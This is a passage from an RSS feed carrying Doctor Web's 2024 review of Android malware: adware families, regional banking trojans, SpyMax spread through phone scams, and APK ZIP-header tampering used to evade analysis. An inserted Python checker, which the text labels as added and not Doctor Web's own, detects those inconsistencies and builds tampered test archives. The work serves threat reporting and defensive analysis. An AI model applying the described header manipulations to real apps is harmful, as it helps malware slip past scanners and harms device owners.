        variants was distributed as the game “Copper Boom”, and &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14&lt;/b&gt; was disguised as the game “Merge Party”
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        In addition, throughout the year, our malware analysts discovered new adware programs. Among them were apps and games with the 
        built-in adware module &lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;, which is capable of displaying ads from various advertising service providers.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/27_Adware.StrawAd.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/27_Adware.StrawAd.1_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/28_Adware.StrawAd.3_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/28_Adware.StrawAd.3_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/29_Adware.StrawAd.6_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/29_Adware.StrawAd.6_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/30_Adware.StrawAd.9_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/30_Adware.StrawAd.9_2024.1.png" alt="Adware.StrawAd_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of games containing the adware module &lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;: 
        “Crazy Sandwich Runner” (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1&lt;/b&gt;), 
        “Poppy Punch Playtime” (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.3&lt;/b&gt;), 
        “Finger Heart Matching”  (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.6&lt;/b&gt;), 
        and “Toimon Battle Playground” (&lt;a href="https://vms.drweb.com/search/?q=Adware.StrawAd&amp;lng=en"&gt;&lt;b&gt;Adware.StrawAd&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.9&lt;/b&gt;)
    &lt;/em&gt;&lt;/p&gt;

    &lt;p&gt;
        &lt;b&gt;Adware.Basement&lt;/b&gt; adware programs were also distributed via Google Play. 
        Ads from these often lead to malicious and fraudulent websites. It is noteworthy that this family shares a code base with the unwanted &lt;a href="https://vms.drweb.com/search/?q=Program.FakeMoney&amp;lng=en"&gt;&lt;b&gt;Program.FakeMoney&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11&lt;/b&gt; apps.
    &lt;/p&gt;

    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/31_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/31_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/32_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/32_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;div class="flex fxCenter"&gt;
        &lt;div class="margRM"&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/33_Adware.Basement.1_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/33_Adware.Basement.1_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
        &lt;div&gt;
            &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/34_Adware.Basement.2_2024.png" class="preview"&gt;
                  &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/34_Adware.Basement.2_2024.1.png" alt="Adware.Basement_2024"&gt;
            &lt;/a&gt;
        &lt;/div&gt;
    &lt;/div&gt;
    &lt;p class="noMargT alignCenter"&gt;&lt;em&gt;
        Examples of &lt;b&gt;Adware.Basement&lt;/b&gt; 
        unwanted adware programs: “Lie Detector: Lie Prank Test”, “TapAlarm:Don't touch my phone”, and “Magic Voice Changer” (&lt;b&gt;Adware.Basement.1&lt;/b&gt;); 
        and “Auto Clicker:Tap Auto” (&lt;b&gt;Adware.Basement.2&lt;/b&gt;)
    &lt;/em&gt;&lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="troj"&gt;
    &lt;h2 class="alignCenter"&gt;Banking trojans&lt;/h2&gt;
    &lt;p&gt;
        According to detection statistics provided by Dr.Web Security Space for mobile devices, in 2024, banking trojans represented 6.29% of the total number 
        of registered malicious apps, which is up 2.71 percentage points from the previous year. Starting in January, their activity steadily declined, but from mid-spring 
        onwards, the number of attacks started to increase again. Their activity remained virtually unchanged during the third quarter, after which it rose again, 
        reaching an annual maximum in November.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/35.1_banker_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/35.1_banker_2024_en.png" alt="Banker_Stat_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        In 2024, well-known banking trojan families became widespread again. 
        Among them were the malicious programs &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot.Coper&amp;lng=en" target="_blank" rel="noopener noreferrer"&gt;Coper&lt;/a&gt;, 
        Hydra (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1048.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.563.origin&lt;/b&gt;), 
        Ermac (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1015.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.15017&lt;/b&gt;), 
        Alien (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.745.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1078.origin&lt;/b&gt;), 
        Anubis (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.670.origin&lt;/b&gt;). 
        In addition, attacks using the following were observed: Cerberus (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.11404&lt;/b&gt;), 
        GodFather (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GodFather.3&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GodFather.14.origin&lt;/b&gt;), and Zanubis (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.Zanubis.7.origin&lt;/b&gt;).
    &lt;/p&gt;
    &lt;p&gt;
        Over the course of 2024, malicious actors actively distributed &lt;b&gt;Android.SpyMax&lt;/b&gt; spyware trojans, which have rich malicious functionality. 
        They are also widely used as banking trojans. This family originally included the multifunctional RAT trojan SpyNote (RAT — Remote Administration 
        Trojan or Remote Access Trojan). However, after its source code was leaked, many new modifications based on this code started to emerge, including 
        CraxsRAT and G700 RAT. Dr.Web Security Space detection statistics show that members of this family became more active in the second half of 2023; 
        since then, almost every month they have been detected in increasing numbers, and this trend continues.
    &lt;/p&gt;
    &lt;p&gt;
        &lt;b&gt;Android.SpyMax&lt;/b&gt; trojans target users all over the world. Last year, they were also found to be involved in numerous attacks on Russian users, 
        as 46.23% of the detections of this family were registered on devices belonging to this particular audience. These trojans were also most actively 
        distributed among Brazilian (35.46% of detections) and Turkish (5.80% of detections) Android device owners.
    &lt;/p&gt;
    &lt;p&gt;
        It is noteworthy that these malicious programs are mainly distributed in Russia not via spam or classic phishing, but during one stage of telephone fraud. 
        At the beginning of their call, threat actors traditionally try to convince their victims that they are employees of a bank or a law enforcement agency. 
        They inform them about a problem that has allegedly occurred, e.g., an attempt to steal money from the victim’s bank account or an unplanned loan; or, on 
        the contrary, they report “good news” about free money that is supposedly due to their victims from the government. When the scammers realize that a user has 
        believed them, they encourage their victim to install an “anti-virus update”, a “banking program”, or some other similar app—for example, to “ensure a secure 
        transaction”. Such a program will, in fact, contain an &lt;b&gt;Android.SpyMax&lt;/b&gt; trojan.
    &lt;/p&gt;

    &lt;div class="column_grid_review column_grid_review--o"&gt;
        &lt;a href="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/36_Android.SpyMax_share_2024_en.png" class="preview"&gt;
          &lt;img src="https://st.drweb.com/static/new-www/news/2025/january/review_mobile/36_Android.SpyMax_share_2024_en.png" alt="Android.SpyMax_2024"&gt;
        &lt;/a&gt;
    &lt;/div&gt;

    &lt;p&gt;
        In 2024, Russian users also encountered the Falcon banking trojan family (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.988.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5703&lt;/b&gt;) 
        and the Mamont family (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.637.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.712.origin&lt;/b&gt;). In addition, attacks involving the banking trojans 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.791.origin&lt;/b&gt; and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.829.origin&lt;/b&gt; were observed. These targeted Android device owners from Russia and Uzbekistan. 
        Other attacks were perpetrated by &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.802.origin&lt;/b&gt; and affected Russian, Azerbaijani, and Uzbekistani users. 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.757.origin&lt;/b&gt; targeted users from Russia, Uzbekistan, Tajikistan, and Kazakhstan.
    &lt;/p&gt;
    &lt;p&gt;
        Our experts once again detected attacks coming from the MoqHao trojans (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.367.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.430.origin&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.470.origin&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.593.origin&lt;/b&gt;) 
        that were aimed at users from many countries, including Southeast Asian and Asia-Pacific countries. 
        The same audience was also targeted by other trojans. For example, South Korean Android device owners encountered families like Fakecalls 
        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.919.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.14423&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5297&lt;/b&gt;), 
        IOBot (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.IOBot.1.origin&lt;/b&gt;), and Wroba (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.360.origin&lt;/b&gt;). Other Wroba modifications 
        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.907.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1128.origin&lt;/b&gt;) 
        attacked users from Japan.
    &lt;/p&gt;
    &lt;p&gt;
        Banking trojans that threatened Chinese users included, for instance, the &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.480.origin&lt;/b&gt; trojan, 
        and Vietnamese users were attacked by &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1111.origin&lt;/b&gt;. 
        At the same time, cybercriminals used trojans like TgToxic (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.TgToxic.1&lt;/b&gt;) to attack bank customers from Indonesia, 
        Thailand, and Taiwan, and the GoldDigger trojan
        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.GoldDigger.3&lt;/b&gt;) was used to target users from Thailand and Vietnam.
    &lt;/p&gt;
    &lt;p&gt;
        Attacks on Iranian users were again recorded. These users encountered such banking trojans as &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.709.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5292&lt;/b&gt;, 
        &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.777.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1106.origin&lt;/b&gt;, and some others. 
        And banking trojans that attacked Turkish bank customers included representatives of the Tambir family 
        (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1104.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1099.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1117.origin&lt;/b&gt;), along with some others.
    &lt;/p&gt;
    &lt;p&gt;
        Banking trojans like &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.797.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.817.origin&lt;/b&gt; 
        and &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5435&lt;/b&gt; targeted Indian users.
        These trojans were camouflaged as software that was allegedly related to the credit institutions Airtel Payments Bank, PM KISAN, and IndusInd Bank. 
        In addition, Rewardsteal banking trojans (&lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.719.origin&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5147&lt;/b&gt;, &lt;a href="https://vms.drweb.com/search/?q=Android.Banker&amp;lng=en"&gt;&lt;b&gt;Android.Banker&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.5443&lt;/b&gt;) 
        remained active. These primarily targeted Indian customers of banks like Axis bank, HDFC Bank, SBI, ICICI Bank, RBL bank, and Citi bank.
    &lt;/p&gt;
    &lt;p&gt;
        In Latin American countries, PixPirate (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1026.origin&lt;/b&gt;) trojan activity was observed; these trojans target Brazilian bank customers.
    &lt;/p&gt;
    &lt;p&gt;
        Among the trojans targeting European users were Anatsa (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.Anatsa.1.origin&lt;/b&gt;) and Copybara (&lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.15140&lt;/b&gt; and 
        &lt;a href="https://vms.drweb.com/search/?q=Android.BankBot&amp;lng=en"&gt;&lt;b&gt;Android.BankBot&lt;/b&gt;&lt;/a&gt;&lt;b&gt;.1100.origin&lt;/b&gt;). The latter mainly targets users from Italy, the United Kingdom, and Spain.
    &lt;/p&gt;
    &lt;p&gt;
        During 2024, Doctor Web’s virus analysts observed an increase in the popularity of certain methods of protecting Android malware (primarily banking trojans) 
        from analysis and detection. In particular, attackers performed various manipulations with the ZIP format on which Android APK files are based. As a result, 
        many instruments of static analysis that use standard algorithms to work with ZIP archives are unable to correctly process such “damaged” files. At the same 
        time, the Android OS accepts such modified trojans as normal programs, allowing them to be installed and run.
    &lt;/p&gt;
    &lt;p&gt;
        One common technique is to manipulate the &lt;span class="string"&gt;compression method&lt;/span&gt; and &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        fields in the local file header inside the APK. Threat actors intentionally specify wrong values for the &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        and &lt;span class="string"&gt;uncompressed size&lt;/span&gt; fields, or write an incorrect or nonexistent compression method in the 
        &lt;span class="string"&gt;compression method&lt;/span&gt; field. Another option is to specify a method that does 
        not involve compression (“stored”) for an entry while giving it &lt;span class="string"&gt;compressed size&lt;/span&gt; 
        and &lt;span class="string"&gt;uncompressed size&lt;/span&gt; values that do not match, although for an uncompressed entry they should be equal.
    &lt;/p&gt;
    &lt;p&gt;
        Another popular technique is to put inconsistent disk information in the ECDR (End of Central Directory Record) and in the CD (Central Directory, 
        which holds the data about files and archive parameters). For a single archive both values should match. However, cybercriminals can specify 
        different values, as if the file were not a single archive but one volume of a multi-volume (split) archive.
    &lt;/p&gt;
    &lt;p&gt;
        Also widespread was a technique whereby a flag is set in the local file headers of some files in the archive, indicating that those files are encrypted. 
        In reality they are not encrypted, but because of this flag such an archive is parsed incorrectly.
    &lt;/p&gt;
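    &lt;p&gt;
        As an added example (not Doctor Web’s code or tooling), the following Python checker walks the EOCD, the central directory and the local file headers of an APK 
        and reports the inconsistencies described above: a compression method Android does not accept, compressed and uncompressed sizes that disagree with each other 
        or with the central directory, a spurious encryption flag, and disk numbers that describe a multi-volume archive. The fixture archive and its tampered copies 
        are constructed inside the block; the helper names are assumptions of this example.
    &lt;/p&gt;

```python
import io
import zipfile

# Signatures of the three ZIP structures the checker walks.
LOCAL_SIG = b"PK\x03\x04"
CD_SIG = b"PK\x01\x02"
EOCD_SIG = b"PK\x05\x06"
# Android installs only APKs whose entries are stored (0) or deflated (8).
VALID_METHODS = {0, 8}


def u16(data, off):
    return int.from_bytes(data[off:off + 2], "little")


def u32(data, off):
    return int.from_bytes(data[off:off + 4], "little")


def check_apk_structure(data):
    """Return findings for ZIP header inconsistencies in `data` (empty = clean).

    Checks mirror the report: invalid method, mismatched sizes, spurious
    encryption flag, and disk numbers describing a multi-volume archive."""
    findings = []
    eocd = data.rfind(EOCD_SIG)
    if eocd == -1:
        return ["no End of Central Directory record found"]
    disk_no = u16(data, eocd + 4)        # number of this disk
    cd_disk = u16(data, eocd + 6)        # disk on which the CD starts
    entries_here = u16(data, eocd + 8)   # CD entries on this disk
    entries_total = u16(data, eocd + 10)
    cd_off = u32(data, eocd + 16)
    if disk_no != 0 or cd_disk != 0 or entries_here != entries_total:
        findings.append(f"EOCD describes a multi-volume archive (disk {disk_no}, "
                        f"CD on disk {cd_disk}, {entries_here}/{entries_total} entries)")
    pos = cd_off
    for _ in range(entries_total):
        if data[pos:pos + 4] != CD_SIG:
            findings.append(f"central directory truncated at offset {pos}")
            break
        cd_flags, cd_method = u16(data, pos + 8), u16(data, pos + 10)
        cd_csize, cd_usize = u32(data, pos + 20), u32(data, pos + 24)
        name_len, extra_len = u16(data, pos + 28), u16(data, pos + 30)
        comment_len, disk_start = u16(data, pos + 32), u16(data, pos + 34)
        lh_off = u32(data, pos + 42)
        name = data[pos + 46:pos + 46 + name_len].decode("utf-8", "replace")
        pos += 46 + name_len + extra_len + comment_len
        if disk_start != 0:
            findings.append(f"{name}: CD entry claims the file starts on disk {disk_start}")
        if data[lh_off:lh_off + 4] != LOCAL_SIG:
            findings.append(f"{name}: no local file header at offset {lh_off}")
            continue
        lh_flags, lh_method = u16(data, lh_off + 6), u16(data, lh_off + 8)
        lh_csize, lh_usize = u32(data, lh_off + 18), u32(data, lh_off + 22)
        if lh_method not in VALID_METHODS:
            findings.append(f"{name}: compression method {lh_method} is not one Android accepts")
        if lh_method != cd_method:
            findings.append(f"{name}: method {lh_method} in local header but {cd_method} in CD")
        if lh_method == 0 and lh_csize != lh_usize:
            findings.append(f"{name}: stored entry but compressed size {lh_csize} "
                            f"differs from uncompressed size {lh_usize}")
        if (lh_csize, lh_usize) != (cd_csize, cd_usize):
            findings.append(f"{name}: sizes {lh_csize}/{lh_usize} in local header "
                            f"but {cd_csize}/{cd_usize} in CD")
        if lh_flags % 2 == 1 or cd_flags % 2 == 1:
            findings.append(f"{name}: encryption flag set (APK entries are never encrypted)")
    return findings


def build_clean_apk():
    """Constructed fixture: a minimal well-formed APK-shaped ZIP, not a real app."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("AndroidManifest.xml", b"manifest placeholder",
                    compress_type=zipfile.ZIP_STORED)
        zf.writestr("classes.dex", b"dex placeholder\n" * 64,
                    compress_type=zipfile.ZIP_DEFLATED)
    return buf.getvalue()


def tampered_samples():
    """Constructed fixtures: copies of the clean archive, each with one header
    field altered as the report describes. The first local file header
    (AndroidManifest.xml) sits at offset 0, so its fields are addressed directly."""
    clean = build_clean_apk()
    eocd = clean.rfind(EOCD_SIG)
    edits = {  # label: (offset, field width in bytes, value written)
        "bogus method": (8, 2, 99),        # local header: nonexistent compression method
        "size mismatch": (22, 4, 7),       # local header: uncompressed size of a stored entry
        "encryption flag": (6, 2, 1),      # local header: general-purpose flag bit 0
        "disk number": (eocd + 4, 2, 1),   # EOCD: "number of this disk" in a one-file archive
    }
    samples = {}
    for label, (off, width, value) in edits.items():
        s = bytearray(clean)
        s[off:off + width] = value.to_bytes(width, "little")
        samples[label] = bytes(s)
    return samples
```

    &lt;p&gt;
        A finding marks structural inconsistency rather than malice on its own, but analysis tooling that parses APKs with a standard ZIP library should treat any of them as a reason to reject or repair the file before trusting the parsed contents.
    &lt;/p&gt;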
    &lt;p&gt;
        Along with manipulating the structure of APK files, malware creators also used other practices, such as modifying the 
        &lt;span class="string"&gt;AndroidManifest.xml&lt;/span&gt; configuration file of Android apps. In particular, they added garbage bytes &lt;span class="string"&gt;b'\x00'&lt;/span&gt; 
        to this file’s attribute structure, causing it to be read incorrectly.
    &lt;/p&gt;
&lt;/section&gt;

&lt;section class="margTM margBM" id="future"&gt;
    &lt;h2 class="alignCenter"&gt;Prospects and trends&lt;/h2&gt;
    &lt;p&gt;
        The past year has shown that cybercriminals are still actively enriching themselves at the expense of Android device owners. 
        Their main tools remain ad-displaying and banking trojans, malicious programs with spyware capabilities, and fraudulent software. 
        In this regard, we should expect the emergence of new threats of this type in 2025.
    &lt;/p&gt;
    &lt;p&gt;
        Despite the steps taken to improve the security of Google Play, this app catalog still remains an Android threat distribution source. 
        Therefore, new malicious and unwanted apps emerging in it should not be ruled out.
    &lt;/p&gt;
    &lt;p&gt;
        Another case of Android TV box sets being infected was detected last year, indicating that malware creators use different attack vectors. 
        It is quite possible that threat actors will not only turn their attention to such devices again, but will also continue to look for other 
        potential targets among the variety of Android gadgets.
    &lt;/p&gt;
    &lt;p&gt;
        It is possible that malware developers will continue to actively introduce new techniques that allow their malicious programs to bypass analysis and detection.
    &lt;/p&gt;
    &lt;p&gt;
        Doctor Web’s specialists continue to both monitor the evolution of mobile cyber threats and ensure that our users are protected. To improve your mobile device security, 
        install Dr.Web Security Space, which helps in the fight against malicious, unwanted, and other dangerous programs; fraudsters; and other threats.
    &lt;/p&gt;
&lt;/section&gt;

&lt;a href="https://github.com/DoctorWebLtd/malware-iocs/blob/master/2024 review of virus activity on mobile devices/README.adoc" target="_blank" rel="noopener noreferrer"&gt;Indicators of compromise&lt;/a&gt;

&lt;style&gt;
    .custom-color-link a {
        color: #73b320;
    }
&lt;/style&gt;

</description></item><item><guid>https://news.drweb.com/show/?i=14976&amp;lng=en</guid><title>Doctor, where did you get these pictures? Using steganography in a cryptocurrency mining campaign.</title><link>https://news.drweb.com/show/?i=14976&amp;lng=en&amp;c=9</link><pubDate>Fri, 24 Jan 2025 07:00:00 GMT</pubDate><description>&lt;p&gt;&lt;b&gt;January 24, 2025&lt;/b&gt;&lt;/p&gt;
